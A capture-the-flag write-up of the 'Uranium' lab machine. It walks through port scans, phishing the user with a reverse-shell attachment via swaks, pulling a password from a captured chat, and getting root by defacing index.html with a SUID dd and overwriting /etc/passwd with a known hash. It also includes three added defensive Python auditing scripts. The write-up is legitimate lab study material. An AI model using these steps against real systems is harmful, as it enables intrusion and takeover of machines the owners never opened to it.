Port scanning

sudo nmap --min-rate 10000 -p- 10.10.254.128
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-03 14:59 UTC
Nmap scan report for 10.10.254.128
Host is up (0.23s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 10.45 seconds
sudo nmap -sT -sV -sC -O -p22,25,80 10.10.254.128
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-03 15:00 UTC
Nmap scan report for 10.10.254.128
Host is up (0.23s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a1:3c:d7:e9:d0:85:40:33:d5:07:16:32:08:63:31:05 (RSA)
| 256 24:81:0c:3a:91:55:a0:65:9e:36:58:71:51:13:6c:34 (ECDSA)
|_ 256 c2:94:2b:0d:8e:a9:53:f6:ef:34:db:f1:43:6c:c1:7e (ED25519)
25/tcp open smtp Postfix smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=uranium
| Subject Alternative Name: DNS:uranium
| Not valid before: 2021-04-09T21:40:53
|_Not valid after: 2031-04-07T21:40:53
|_smtp-commands: uranium, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Uranium Coin
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 3.10 (93%), Adtran 424RG FTTH gateway (92%), Linux 5.4 (92%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (91%), Linux 2.6.18 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: uranium; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.70 seconds
sudo nmap --script=vuln -p22,25,80 10.10.254.128
[sudo] mikannse 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-03 15:01 UTC
Nmap scan report for 10.10.254.128
Host is up (0.23s latency).

PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
| ssl-dh-params:
| VULNERABLE:
| Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
| State: VULNERABLE
| Transport Layer Security (TLS) services that use anonymous
| Diffie-Hellman key exchange only provide protection against passive
| eavesdropping, and are vulnerable to active man-in-the-middle attacks
| which could completely compromise the confidentiality and integrity
| of any data exchanged over the resulting session.
| Check results:
| ANONYMOUS DH GROUP 1
| Cipher Suite: TLS_DH_anon_WITH_SEED_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 2048
| Generator Length: 8
| Public Key Length: 2048
| References:
|_ https://www.ietf.org/rfc/rfc2246.txt
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 127.0.1.1
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.254.128
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.254.128:80/
| Form id: demo-name
|_ Form action: #
| http-enum:
| /README.txt: Interesting, a readme.
|_ /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'

Nmap done: 1 IP address (1 host up) scanned in 53.82 seconds

Web

The port 25 scan seems to flag a man-in-the-middle weakness, but let's look at port 80 first: it is a portal site.

Directory brute-forcing turns up a README.txt, but it does not seem to be related to this room.

Back to the room itself: it turns out a Twitter account is provided, interesting. We get the domain uranium.thm.

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u 'http://uranium.thm' -H 'HOST:FUZZ.uranium.thm' -fs 10351

Fuzzing for subdomains; there do not seem to be any.

We learn that his username is hakanbey. He also says he automatically checks "application" program files in his mailbox, so maybe phishing is an option?

Getshell

Write a reverse shell; it can be sent with the swaks tool.

swaks --to hakanbey@uranium.thm --from genshin@mihoyo.com --header "Subject: Nothing" --body "nothhing" --server 10.10.254.128 --attach application

Shortly afterwards the reverse shell comes back.

Lateral movement

A binary is found in the home directory.

Surprisingly there is no write permission in /var/www/html. I wanted to drop a webshell, but the site looks like a purely static front end anyway. However, a pcap capture was found in /var/log; pull it over to Kali for traffic analysis.

It is all unencrypted TCP traffic (nice).

This exchange is in it:

MBMD1vdpjg3kGv6SsIz56VNG
Hi Kral4
Hi bro
I forget my password, do you know my password ?
Yes, wait a sec I'll send you.
Oh , yes yes I remember. No need anymore. Ty..
Okay bro, take care !
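As an added example (not part of the original writeup), the following pure-Python pcap reader does what finding this chat in Wireshark amounts to: it walks the classic libpcap record format, peels Ethernet/IPv4/TCP headers, and keeps only segments whose payload is printable text. The capture it reads is constructed inline by the `build_pcap` helper; the addresses, ports and the binary blob are assumptions, and only the chat lines come from the page.

```python
import socket
import struct

PCAP_MAGIC = 0xA1B2C3D4      # classic libpcap magic (microsecond timestamps)
LINKTYPE_ETHERNET = 1


def build_pcap(packets):
    """Serialise (src_ip, dst_ip, sport, dport, payload) tuples into a minimal
    little-endian pcap file (Ethernet/IPv4/TCP, checksums left at zero).
    Helper used only to construct the sample capture; not needed for real files."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, (src, dst, sport, dport, payload) in enumerate(packets):
        tcp = struct.pack("!HHIIBBHHH", sport, dport, 1000 + i, 0,
                          5 << 4, 0x18, 65535, 0, 0) + payload      # 20-byte header, PSH|ACK
        ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), i, 0, 64, 6, 0,
                         socket.inet_aton(src), socket.inet_aton(dst))
        frame = b"\x00" * 12 + b"\x08\x00" + ip + tcp              # dst MAC, src MAC, EtherType IPv4
        out += struct.pack("<IIII", 1701615600 + i, 0, len(frame), len(frame)) + frame
    return out


def extract_tcp_payloads(data):
    """Return (src, dst, payload) for every TCP segment in a classic pcap file
    that carries data. Handles both byte orders of the global header."""
    magic = struct.unpack("<I", data[:4])[0]
    if magic == 0xA1B2C3D4:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    if struct.unpack(endian + "I", data[20:24])[0] != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are supported")
    pos, results = 24, []
    while pos + 16 <= len(data):
        _sec, _usec, incl_len, _orig_len = struct.unpack(endian + "IIII", data[pos:pos + 16])
        pos += 16
        frame = data[pos:pos + incl_len]
        pos += incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue                                   # not IPv4
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        if ip[9] != 6:
            continue                                   # not TCP
        total_len = struct.unpack("!H", ip[2:4])[0]
        src, dst = socket.inet_ntoa(ip[12:16]), socket.inet_ntoa(ip[16:20])
        tcp = ip[ihl:total_len]
        if len(tcp) < 20:
            continue
        sport, dport = struct.unpack("!HH", tcp[:4])
        payload = tcp[(tcp[12] >> 4) * 4:]
        if payload:
            results.append((f"{src}:{sport}", f"{dst}:{dport}", payload))
    return results


def is_text(payload):
    """True when every byte is printable ASCII or tab/CR/LF."""
    return all(32 <= b < 127 or b in (9, 10, 13) for b in payload)


def plaintext_messages(pcap_bytes):
    """Return (flow, text) for each segment whose payload is readable text;
    binary/TLS-looking payloads are dropped so only cleartext chatter is shown."""
    return [(f"{s} -> {d}", p.decode("ascii"))
            for s, d, p in extract_tcp_payloads(pcap_bytes) if is_text(p)]


# Constructed sample capture: one binary blob (dropped) and four cleartext chat lines.
SAMPLE_CAPTURE = build_pcap([
    ("10.10.254.128", "10.10.254.10", 43210, 443, b"\x16\x03\x01\x00\x05\x01\x02\x03\x04\x05"),
    ("10.10.254.128", "10.10.254.10", 43211, 9999, b"Hi Kral4\n"),
    ("10.10.254.10", "10.10.254.128", 9999, 43211, b"Hi bro\n"),
    ("10.10.254.128", "10.10.254.10", 43211, 9999, b"I forget my password, do you know my password ?\n"),
    ("10.10.254.10", "10.10.254.128", 9999, 43211, b"Yes, wait a sec I'll send you.\n"),
])

if __name__ == "__main__":
    for flow, text in plaintext_messages(SAMPLE_CAPTURE):
        print(flow, repr(text))
```

Point it at a real file with `plaintext_messages(open("capture.pcap", "rb").read())`; the binary-filter is what separates a credential-bearing cleartext session from the TLS noise around it, which is exactly why a capture sitting readable in /var/log is a finding in its own right.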

I tried them and none were the user's password. Then I remembered the binary in the home directory: it asks for a password when run (lol). Typing in the chat content gave hakanbey's password: Mys3cr3tp4sw0rD

sudo -l shows we can become kral4; could have said so earlier.

sudo -u kral4 /bin/bash
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

A suspicious SUID dd is found; it can write a file anywhere and read any file.
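The find command above lists every setuid/setgid file; what turns that list into a finding is comparing it with what the host is supposed to have. As an added example (not from the original writeup), the audit below does that walk in Python and reports any setuid/setgid regular file not in an approved baseline. The directory tree it scans is constructed in a temp directory; the baseline entry `usr/bin/passwd` and the unexpected `dd`/`nano` binaries are assumptions standing in for a real host.

```python
import os
import stat
import tempfile


def find_setid_files(root):
    """Walk root and return sorted absolute paths of regular files with the
    setuid or setgid bit set (the same set the find -perm command produces)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue                     # unreadable entry, skip like 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append(path)
    return sorted(hits)


def unexpected_setid(root, baseline):
    """Return root-relative paths of setid files that are not in the approved baseline.
    Anything here (a copied nano, a setuid dd) deserves an explanation."""
    found = (os.path.relpath(p, root) for p in find_setid_files(root))
    return sorted(rel for rel in found if rel not in baseline)


def demo_audit():
    """Constructed tree: usr/bin/passwd is expected to be setuid,
    usr/bin/dd and home/kral4/nano are not, usr/bin/cat is a plain file."""
    root = tempfile.mkdtemp(prefix="setid-audit-")
    layout = {
        "usr/bin/passwd": 0o4755,
        "usr/bin/dd": 0o4755,
        "home/kral4/nano": 0o4755,
        "usr/bin/cat": 0o755,
    }
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(b"#!/bin/sh\n")
        os.chmod(path, mode)                 # set the bit after writing so it is not cleared
    baseline = {"usr/bin/passwd"}            # assumed approved list for this host
    return unexpected_setid(root, baseline)


if __name__ == "__main__":
    for rel in demo_audit():
        print("unexpected setuid/setgid file:", rel)
```

On a real system run `unexpected_setid("/", baseline)` with a baseline captured from a known-good image; a file-integrity tool does the same comparison continuously.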

Privilege escalation

dd if=/var/www/html/web_flag.txt

We can try overwriting /etc/passwd to add a root user; it is best to back the file up first.

Huh, but it reports permission denied, and I do not know why: it is SUID, yet it cannot touch /etc/passwd. Earlier, though, an email to kral4 written by root was found in /var/mail:

I give SUID to the nano file in your home folder to fix the attack on our index.html. Keep the nano there, in case it happens again.

In other words, once index.html is attacked we get a SUID nano.

cp /bin/nano /home/kral4
echo "hacked" | dd of=/var/www/html/index.html

However, the GTFOBins escalation method failed (sad).

So fall back to the /etc/passwd modification prepared earlier.

openssl passwd -1 -salt 123 password

This generates the hash for the password (`password`):

root:$1$123$0HaaUtbhct/mZ/Q/KRa5a.:0:0:root:/root:/bin/bash

Replace the root line with the one above.

Then su!
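The modified root line is easy to spot if anyone looks: a hash sitting directly in /etc/passwd instead of `x`, or a second UID 0 account, are both things the file should never contain. As an added example (not part of the original writeup), the checker below parses passwd-format text and reports those conditions, plus malformed or duplicate entries, and diffs the current file against the backup the text says to take beforehand. The sample content is constructed; the root line is the one from the page, the `backdoor` account and the other users are assumptions.

```python
LOCKED = {"x", "*", "!", "!!"}   # password field values that mean "look in /etc/shadow" or "locked"


def audit_passwd(text):
    """Return a list of (line_number, finding) for suspicious entries in
    /etc/passwd-format text: malformed lines, extra UID-0 accounts, empty
    password fields, hashes stored in passwd itself, duplicate usernames."""
    findings, seen = [], set()
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, "malformed entry (expected 7 colon-separated fields)"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if name in seen:
            findings.append((lineno, f"duplicate username {name!r}"))
        seen.add(name)
        if not uid.isdigit():
            findings.append((lineno, f"non-numeric uid for {name!r}"))
            continue
        if int(uid) == 0 and name != "root":
            findings.append((lineno, f"uid 0 account {name!r} is not root"))
        if pw == "":
            findings.append((lineno, f"empty password field for {name!r} (no password required)"))
        elif pw not in LOCKED:
            findings.append((lineno, f"password hash stored directly in passwd for {name!r}"))
    return findings


def diff_against_backup(backup_text, current_text):
    """Return the entries present in the current file but absent from the backup,
    i.e. every line that was added or edited since the backup was taken."""
    old = set(backup_text.splitlines())
    return [line for line in current_text.splitlines() if line and line not in old]


# Constructed sample: the root line is the modified one from the writeup, the
# backdoor account is an invented second UID-0 entry.
BACKUP_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
hakanbey:x:1000:1000::/home/hakanbey:/bin/bash
kral4:x:1001:1001::/home/kral4:/bin/bash
"""

CURRENT_PASSWD = """\
root:$1$123$0HaaUtbhct/mZ/Q/KRa5a.:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
hakanbey:x:1000:1000::/home/hakanbey:/bin/bash
kral4:x:1001:1001::/home/kral4:/bin/bash
backdoor:x:0:0::/root:/bin/bash
"""

if __name__ == "__main__":
    for lineno, finding in audit_passwd(CURRENT_PASSWD):
        print(f"line {lineno}: {finding}")
    for line in diff_against_backup(BACKUP_PASSWD, CURRENT_PASSWD):
        print("changed since backup:", line)
```

`audit_passwd(open("/etc/passwd").read())` on a clean host should return an empty list; any non-empty result is worth an incident ticket, and the backup diff tells you which lines to restore.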

Closing thoughts

A very interesting room. It has many scenarios that simulate real social-engineering phishing, which shows how skilled the room author is. I also took quite a few detours.